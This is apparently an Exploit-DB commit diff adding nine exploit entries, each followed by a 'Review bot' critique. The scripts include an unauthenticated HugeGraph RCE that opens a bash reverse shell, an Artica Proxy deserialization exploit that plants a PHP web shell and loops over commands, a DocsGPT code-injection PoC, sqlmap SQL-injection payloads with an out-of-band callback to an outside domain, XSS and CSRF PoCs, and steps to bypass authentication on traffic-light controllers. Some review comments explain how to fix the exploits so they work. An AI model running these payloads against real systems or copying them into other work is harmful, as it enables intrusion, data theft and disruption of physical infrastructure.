DB: 2025-04-10

10 changes to exploits/shellcodes/ghdb

Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)

Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege

Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

Artica Proxy 4.50 - Remote Code Execution (RCE)

ChurchCRM 5.9.1 - SQL Injection

PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)

ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)

DocsGPT 0.12.0 - Remote Code Execution
This commit is contained in:
Exploit-DB 2025-04-10 00:16:32 +00:00
parent 2bc15f74f8
commit 762197db08
10 changed files with 572 additions and 0 deletions

56
exploits/java/webapps/52149.py Executable file

@ -0,0 +1,56 @@
# Exploit Title: Apache HugeGraph < 1.2.0 Remote Code Execution (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
# Version: Apache HugeGraph 1.0.0 - 1.2.0
# CVE : CVE-202427348
from requests import Request, Session
import sys
import json
def title():
print('''
______ _______ ____ ___ ____ _ _ ____ _____ _____ _ _ ___
/ ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \___ |___ /| || | ( _ )
| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | / / |_ \| || |_ / _ \
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / / ___) |__ _| (_) |
\____| \_/ |_____| |_____|\___/_____| |_| |_____/_/ |____/ |_| \___/
[+] Reverse shell
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-202427348/exploit.py
''')
def exploit(url, lhost, lport):
payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
headers = {
'Content-Type': 'application/json'}
s = Session()
url = url + "/gremlin"
req = Request('POST', url, json=payload, headers=headers)
prepped = req.prepare()
del prepped.headers['Content-Type']
resp = s.send(prepped,
verify=False,
timeout=15)
print(prepped.headers)
print(url)
print(resp.headers)
print(payload)
print(resp.status_code)
print(resp.text)
if __name__ == '__main__':
title()
if(len(sys.argv) < 4):
print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))
print('[+] Do not forget to run the listener: nc -lvp 4444\n')
exit(0)
else:
exploit(sys.argv[1],sys.argv[2],sys.argv[3])
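Review bot: the reverse-shell command in `exploit()` passes `0>&1` as a fourth list element, so `bash -c` receives it as `$0` rather than as part of the script and stdin is never redirected to the socket; fold it into the command string (`"bash -i >& /dev/tcp/" + lhost + "/" + lport + " 0>&1"`) and drop the extra element. Two header points: `# CVE : CVE-202427348` is missing its hyphen (the CSV row uses CVE-2024-27348), and the title says `< 1.2.0` while the Version line says `1.0.0 - 1.2.0`; state one affected range. The `headers` dict sets `Content-Type: application/json` and `json=payload` sets it again, then `del prepped.headers['Content-Type']` removes it before sending, so the dict is dead code and the deletion deserves a comment explaining why the endpoint is called without a content type.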


@ -0,0 +1,62 @@
# Exploit Title: ManageEngine ADManager Plus Build < 7210 Elevation of
Privilege Vulnerability
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/ad-manager/
# Details: https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
# Version: ADManager Plus Build < 7210
# Tested against: Build 7203
# CVE: CVE-2024-24409
# Description
The Modify Computers is a predefined role in ADManager for managing
computers. If a technician user has the Modify Computers privilege
over a computer can change the userAccountControl and
msDS-AllowedToDelegateTo attributes of the computer object. In this
way, the technician user can set Constrained Kerberos Delegation over
any computer within the Organizational Unit that the user was
delegated.
Contrary to what ADManager claims the user who has the Modify
Computers role can change the privilege of computer objects in the
Active Directory. The Constrained Kerberos Delegation can be set for
any service such as CIFS, LDAP, HOST services. Then the user can
access these services by abusing the Constrained Kerberos Delegation.
In addition, the Unconstrained Kerberos Delegation can be set over the
computer objects by changing the userAccountControl attribute.
Normally, only users that have SeEnableDelegationPrivilege privilege
can set constrained kerberos delegation. Only members of the
BUILTIN\Administrators group have this privilege by default. The
delegated user for an Organizational Unit can not set constrained
kerberos delegation even if a user has the GenericAll right over a
computer account, so the delegation process in Active Directory does
not grant this privilege. However, the technician user can use the
SeEnableDelegationPrivilege right via the Modify Computers role.
# Vulnerability reasons
1. ADMP Web App Authorization issue: Assigning a predefined Modify
Computers role delegates the technician user to modify custom
attributes of computers unexpectedly. Even though it appears that this
privilege is not granted in the UI, the Additional Custom Attribute
property is assigned and this leads to broken access control
vulnerability.
2. There is no restriction for editing the userAccountControl and
msDS-AllowedToDelegateTo attributes of the computer objects. The ADMP
application performs changes with domain admin privileges as designed
so that if we can bypass some restrictions (e.g. format of attribute
value), our requests are applied with domain admin privileges. This
way we can edit the attributes userAccountControl and
msDS-AllowedToDelegateTo.
# Impact
A technician user elevates privileges from Domain User to Domain
Admin. For example, the user can set Constrained Kerberos Delegation
over CLIENT1$ for the CIFS service of the domain controller and access
the CIFS service. As a result, the user is delegated to manage
CLIENT1$ but he can access the CIFS service of the domain controller
impersonating a user unexpectedly.
# Proof Of Concept
https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
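Review bot: the `# Proof Of Concept` section contains only an external link, so the file carries no reproducible request of its own; include the Modify Computers request inline (endpoint, and the `userAccountControl` / `msDS-AllowedToDelegateTo` values that were accepted) so the entry still works if the blog moves. The `# Exploit Title:` header wraps onto a second line (`Privilege Vulnerability`), which breaks the one-line header convention the other files follow, and in `# Description` the sentence `If a technician user has the Modify Computers privilege over a computer can change ...` is missing its subject (`... over a computer, they can change ...`).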


@ -0,0 +1,24 @@
# Exploit Title: MaxTime Database Editor 1.9 Authentication Bypass
# Google Dork: N/A
# Date: 07/09/2024
# Exploit Author: Andrew Lemon/Red Threat https://redthreatsec.com
# Vendor Homepage: https://www.q-free.com
# Software Link: N/A
# Version: 1.9
# Tested on: (Intelight x-1) Linux 3.14.57
# CVE : CVE-2024-38944
## Vulnerability Description
This vulnerability allows remote attackers to bypass authentication on affected installations of MaxTime Database Editor.
Authentication is not required to exploit this vulnerability.
The specific flaw exists within the web-based UI on Traffic Controllers running version 1.9.x firmware.
The issue results from the lack of authentication prior to allowing access to functionality.
An attacker can leverage this vulnerability to gain full control of Intelight Traffic Controllers and modify the configuration of a traffic intersection,
modify traffic light sequences, or trigger the intersection to go into 4 way flash causing a denial of service and causing traffic congestion.
## Steps to Reproduce
Navigate to the IP address of an identified controller
When prompted for authentication append /cgi-bin/generateForm.cgi?formID=142 to the end of the IP address
Under the web security tab change the drop down from enabled to disabled and select apply or take note of the username and password and login with those.
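Review bot: the file describes an authentication bypass (reaching `formID=142` without credentials, then disabling web security or reading the stored username and password), not code execution, yet the CSV row lists it as `Remote Code Execution (RCE)`; the file title (`MaxTime Database Editor 1.9 Authentication Bypass`) and version (`1.9` / `1.9.x` versus `Maxtime 1.9.6` in the CSV) need to be reconciled with the row. `# Date: 07/09/2024` is ambiguous about day/month order where the repository otherwise uses ISO dates. The steps would also read more safely with the full URL form, e.g. `http://<controller>/cgi-bin/generateForm.cgi?formID=142`, since `append ... to the end of the IP address` is easy to misread.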

78
exploits/php/webapps/52146.py Executable file

@ -0,0 +1,78 @@
# Exploit Title: CVE-2024-2054 Artica-Proxy administrative web
application insecure deserialization (RCE)
# Google Dork:
# Date: 23-04-2024
# Exploit Author: Madan
# Vendor Homepage: https://artica-proxy.com/
# Version: 4.40, 4.50
# Tested on: [relevant os]
# CVE : CVE-2024-2054
you can also find the exploit on my github repo:
https://github.com/Madan301/CVE-2024-2054
import requests
import base64
import urllib3
from colorama import Fore
print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
sometimes vary from how artica proxy interface is hosted")
URL = input("Enter url: ")
if URL[-1]=="/":
ACTUAL_URL = URL[:-1]
else:
ACTUAL_URL = URL
ARTICA_URL = ACTUAL_URL
def check(ARTICA_URL):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
try:
check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
except Exception as e:
print(Fore.RED+"Could not reach, check URL")
if check.status_code==200:
print(Fore.GREEN+"Vulnerable")
return True
else:
print(Fore.RED+"Not Vulnerable")
def exploit(ARTICA_URL):
payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
payload_data = {
"TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
"cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
"cache_serializer": "json",
"cache_size": 999999999,
"cache_data": {
payload: {
"cache_date": 0,
"ttl": 999999999
}
}
}
}
while True:
PAYLOAD_CMD = input("enter command: ")
url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.get(url, verify=False)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if response.status_code == 200:
cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
cmd_response = requests.get(cmd_url, verify=False)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
print(cmd_response.text)
else:
print("Failed to execute the payload")
check = check(ARTICA_URL=ACTUAL_URL)
if check==True:
exploit(ARTICA_URL=ARTICA_URL)
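Review bot: the file is not valid Python as committed: the two lines `you can also find the exploit on my github repo:` / `https://github.com/Madan301/CVE-2024-2054` sit outside any comment between the header block and `import requests`, so the interpreter stops with a SyntaxError before anything runs; prefix them with `#`. In `check()`, when `requests.get` raises, the except branch prints and then falls through to `check.status_code` on a name that was never bound (UnboundLocalError); return False there instead. `payload_data` is a Python dict interpolated into the URL with `f"...?build-js={payload_data}"`, which emits the dict's repr (single quotes, spaces, braces) rather than whatever encoding the endpoint expects; the file should show the actual serialized and URL-encoded string so a reader can see what the server deserializes. The check also reports `Vulnerable` for any host that returns 200 on `/wizard/wiz.upload.php`, which is a presence check, not a vulnerability check. Minor: `check = check(...)` at module level rebinds the function name, `urllib3.disable_warnings` is called on every loop iteration, and `PAYLOAD_CMD` goes into the query string without `urllib.parse.quote`, so commands containing `&` or `#` will be truncated.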


@ -0,0 +1,39 @@
# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
# Date: 04/28/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://anchorcms.com/
# Software Link:
https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
# Version: latest
# Tested on: MacOS
# Log in to Anchor CMS.
# Click on "Create New Post".
# Fill in the "Title" and enter the following payload in the field
immediately below:
# "><script>alert()</script>
# Go to the homepage, and you will see the alert!
### PoC Request ###
POST /anchor/admin/posts/edit/2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 278
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/anchor/admin/posts/edit/2
Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta;
anchorcms=hlko7b1dbdpjgn58himf2obht5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false
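Review bot: the PoC request places the payload in two parameters, `markdown=...` and `js=...`; `js` (next to `css`) is the post's custom-script field, where an authenticated author's script executing is the designed behaviour, so the stored-XSS claim has to rest on `markdown` (or `title`) alone and the request should demonstrate one parameter at a time. The text steps say the payload goes in `the field immediately below` the title without naming the parameter; say `markdown` explicitly. `# Version: latest` should be `0.12.7` to match the title, and the `Cookie` and `token` values are live session material that can be replaced with placeholders. The repository already holds 48832 (`Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)`, 2020) for the same product and version; the submission should state how this finding differs from it.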


@ -0,0 +1,69 @@
# Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting
via Content Form
# Date: 8-7-2024
# Category: Web Application
# Exploit Author: Jeremia Geraldi Sihombing
# Version: 2.10.1
# Tested on: Windows
# CVE: CVE-2024-39143
Description:
----------------
A stored cross-site scripting (XSS) vulnerability exists in
ResidenceCMS 2.10.1 that allows a low-privilege user to create
malicious property content with HTML inside it, which acts as a
stored XSS payload. If this property page is visited by anyone
including the administrator, then the XSS payload will be triggered..
Steps to reproduce
-------------------------
1. Login as a low privilege user with property edit capability.
2. Create or Edit one of the user owned property
(We can user the default property owned by the user).
3. Fill the content form with XSS payload using the Code View feature.
Before saving it make sure to go back using the usual view to see if the HTML
is rendered or not.
Vulnerable parameter name: property[property_description][content]
Example Payload: <img src="x" onerror="alert(document.cookie)">
4. After saving the new property content and clicking the 'Finish Editing',
go to the page and see the XSS is triggered.
It is possible to trigger the XSS by using any account or even
unauthorized account.
Burp Request
-------------------
POST /en/user/property/7/edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0)
Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml
xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1111
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/en/user/property/7/edit
Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~;
PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished
renovated 2-bedroom 2-bathroom
flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished
renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore
Blvd, Tampa, FL
33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img
src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg
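Review bot: the example payload in step 3 is `alert(document.cookie)` while the Burp request sends `alert(document.domain)`; use the same payload in both so the two can be matched. The `# Exploit Title:` header wraps onto a second line (`via Content Form`), and the `Accept:` header is split mid-value (`application/xhtml` / `xml,...`), so the request will not paste back into Burp without repair. `It is possible to trigger the XSS by using any account or even unauthorized account` reads better as `the payload fires for any visitor of the property page, authenticated or not`, which is what the Description already says. The `REMEMBERME` cookie is a real remember-me token for the test account and should be a placeholder.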


@ -0,0 +1,148 @@
## Exploit Title: ChurchCRM v4.5.3-121fcc1 - SQL Injection
## Author: Sanan Qasimzada
## Date: 06.07.2024
## Vendor: http://churchcrm.io/
## Software: https://github.com/ChurchRM/CRM
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
In the manual insertion point 1 - parameter `EID` appears to be
vulnerable to SQL injection attacks.
No need for cookies, no need admin authentication and etc.
The attacker easily can steal information from this system by using
this vulnerability.
STATUS: HIGH Vulnerability - CRITICAL
[+]Payload:
```mysql
---
Parameter: EID (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
\\ior'))
OR NOT 2407=2407
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
\\ior'))
AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX)
Type: UNION query
Title: MySQL UNION query (UTF8) - 11 columns
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
\\ior'))
UNION ALL SELECT
'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'#
---
```
## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1
)
## Proof and Exploit:
[href](https://streamable.com/1eqhw2)
## Time spend:
01:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
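Review bot: the file content does not match the CSV row it was added under: the title says `ChurchCRM v4.5.3-121fcc1`, the Reproduce link points to nu11secur1ty's 2023 `ChurchCRM-4.5.3-121fcc1` directory, and the signature block is nu11secur1ty's, while the CSV lists `ChurchCRM 5.9.1 - SQL Injection` by Sanan Qasimzada with CVE-2024-39304; this reads as a resubmission of the existing entry 51296 (`ChurchCRM v4.5.3-121fcc1 - SQL Injection`, 2023-04-06). If 5.9.1 is really affected, the file needs its own header with that version and CVE, and it needs to name the script or endpoint that takes `EID`, which it never does (`manual insertion point 1` is sqlmap's wording, not a location). The sqlmap payloads also embed an out-of-band `load_file('\\\\...smotaniak.com\\ior')` callback to a third-party domain that anyone replaying the PoC will beacon to; strip it, since the boolean, time-based and UNION payloads do not depend on it. The signature block is included twice at the end.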


@ -0,0 +1,54 @@
# Exploit Title: pz-frontend-manager <= 1.0.5 - CSRF change user profile
picture
# Date: 2024-07-01
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/
# Version: <= 1.0.5
# Tested on: Firefox
# Contact me: vulns@vulnseeker.org
The plugin does not have CSRF checks in some places, which could allow
attackers to make logged in users perform unwanted actions via CSRF attacks.
Proof of concept:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:10003
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1093
Origin: http://localhost:10003
Sec-GPC: 1
Connection: close
Cookie: Cookie
action=pzfm_upload_avatar&imageData=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx%2FBy7bYvtl4Y8Qn%2BtEjty6WxuQ0KkfOM5wJEeEkT1bsigU%2BxGQV%2BQfZ2ned0LAkLnyQ4XV2XB%2Fk%2BjXdTs8Mc1%2BUlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO%2BqN1sFvJm%2BIScB7s3uo8ZVzC8RrsXjIuqp2n0d%2BsxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6Jf2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rvD9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg%3D%3D&userID=1
CSRF Exploit:
<html>
<body>
<form action="http://localhost:10003/wp-admin/admin-ajax.php"
method="POST">
<input type="hidden" name="action" value="pzfm_upload_avatar" />
<input type="hidden" name="imageData"
value="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx/By7bYvtl4Y8Qn+tEjty6WxuQ0KkfOM5wJEeEkT1bsigU+xGQV+QfZ2ned0LAkLnyQ4XV2XB/k+jXdTs8Mc1+UlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO+qN1sFvJm+IScB7s3uo8ZVzC8RrsXjIuqp2n0d+sxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0+6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5/BKh8H/3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs/EBXgoZ6Jf2KMNMYz4FgBJjTGkxR/H67vm/H8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle/P/MPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO+yev2NVDtZLeX5rvD9lu0zauxW+a6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF+xW+YcT47Jkdzi4TpT+lPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg=="
/>
<input type="hidden" name="userID" value="1"" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Profile picture of user 1 will be changed in the dashboard
http://localhost:10003/dashboard/?dashboard=profile
Reference:
https://wpscan.com/vulnerability/73ba55a5-6cff-40fc-9686-30c50f060732/
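Review bot: the HTML PoC has a stray quote in `<input type="hidden" name="userID" value="1"" />`; it should be `value="1" />`. Both the captured request and the form send `userID=1`, so the account whose avatar changes is chosen by the attacker rather than derived from the session; the write-up should say whether the handler trusts `userID` (which would be an authorization issue on top of the missing nonce) or only accepts it when it equals the logged-in user, because the impact differs. `Cookie: Cookie` is a placeholder left in the captured request, and the file title (`CSRF change user profile picture`) is more specific than the CSV description (`Cross Site Request Forgery (CSRF)`); the action belongs in the description.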


@ -0,0 +1,33 @@
# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
# Date: 09/04/2025
# Exploit Author: Shreyas Malhotra (OSMSEC)
# Vendor Homepage: https://github.com/arc53/docsgpt
# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
# Version: 0.8.1 through 0.12.0
# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
# CVE: CVE-2025-0868
import requests
# TARGET CONFIG
TARGET = "http://10.0.2.15:7091" # Change this
# Malicious payload string - carefully escaped - modify the python code if necessary
malicious_data = (
'user=1&source=reddit&name=other&data={"source":"reddit",'
'"client_id":"1111","client_secret":1111,"user_agent":"111",'
'"search_queries":[""],"number_posts":10,'
'"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}'
)
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data)
print(f"[+] Status Code: {response.status_code}")
print("[+] Response Body:")
print(response.text)
except Exception as e:
print(f"[-] Error sending request: {e}")
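Review bot: the script only fires `touch /tmp/test` and prints the HTTP status, so a 200 is not evidence that the injected command ran; the PoC should use a command with an attacker-observable effect (a callback, or output that lands in the response) or state what to check on the target. The comment `carefully escaped - modify the python code if necessary` does not say what the server does with `data`: the `"rce\\\\":__import__('os').system(...)}#` fragment closes the object and the trailing `#` only makes sense if the remaining text is discarded as a Python comment, and one sentence saying so would let a reader adapt the payload. `TARGET` is hard-coded instead of taken from `sys.argv`, and there is no `# Description` section naming the affected `/api/remote` path with `source=reddit`, which is visible only inside the payload.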


@ -5471,6 +5471,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39886,exploits/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",webapps,java,,2016-06-06,2016-06-14,1,,,,,http://www.exploit-db.comapache-continuum-1.4.2-bin.tar.gz,
49398,exploits/java/webapps/49398.rb,"Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)",2021-01-08,"SunCSR Team",webapps,java,,2021-01-08,2021-01-08,1,CVE-2020-17519,,,,,
48978,exploits/java/webapps/48978.py,"Apache Flink 1.9.x - File Upload RCE (Unauthenticated)",2020-11-02,bigger.wing,webapps,java,,2020-11-02,2020-11-02,0,,,,,,
52149,exploits/java/webapps/52149.py,"Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)",2025-04-09,"Yesith Alvarez",webapps,java,,2025-04-09,2025-04-09,0,CVE-2024-27348,,,,,
37110,exploits/java/webapps/37110.py,"Apache JackRabbit - WebDAV XML External Entity",2015-05-26,"Mikhail Egorov",webapps,java,8080,2015-05-26,2017-11-02,0,CVE-2015-1833;OSVDB-122382,,,,,
45673,exploits/java/webapps/45673.py,"Apache OFBiz 16.11.04 - XML External Entity Injection",2018-10-24,"Jamie Parfet",webapps,java,,2018-10-24,2018-10-25,0,,"XML External Entity (XXE)",,,,
48408,exploits/java/webapps/48408.txt,"Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)",2020-05-01,"Faiz Ahmed Zaidi",webapps,java,,2020-05-01,2020-05-01,0,CVE-2019-0235,,,,,
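Review bot: the description `Apache HugeGraph Server 1.2.0` names a single version while 52149.py says `< 1.2.0` in its title and `1.0.0 - 1.2.0` in its Version line; the row should carry the same range the file claims. The `(Unauthenticated)` qualifier from the file title is also worth keeping in the description, since that is the property that distinguishes this entry.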
@ -11991,6 +11992,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49351,exploits/multiple/webapps/49351.html,"IncomCMS 2.0 - Insecure File Upload",2021-01-05,MoeAlBarbari,webapps,multiple,,2021-01-05,2021-01-05,0,CVE-2020-29597,,,,,
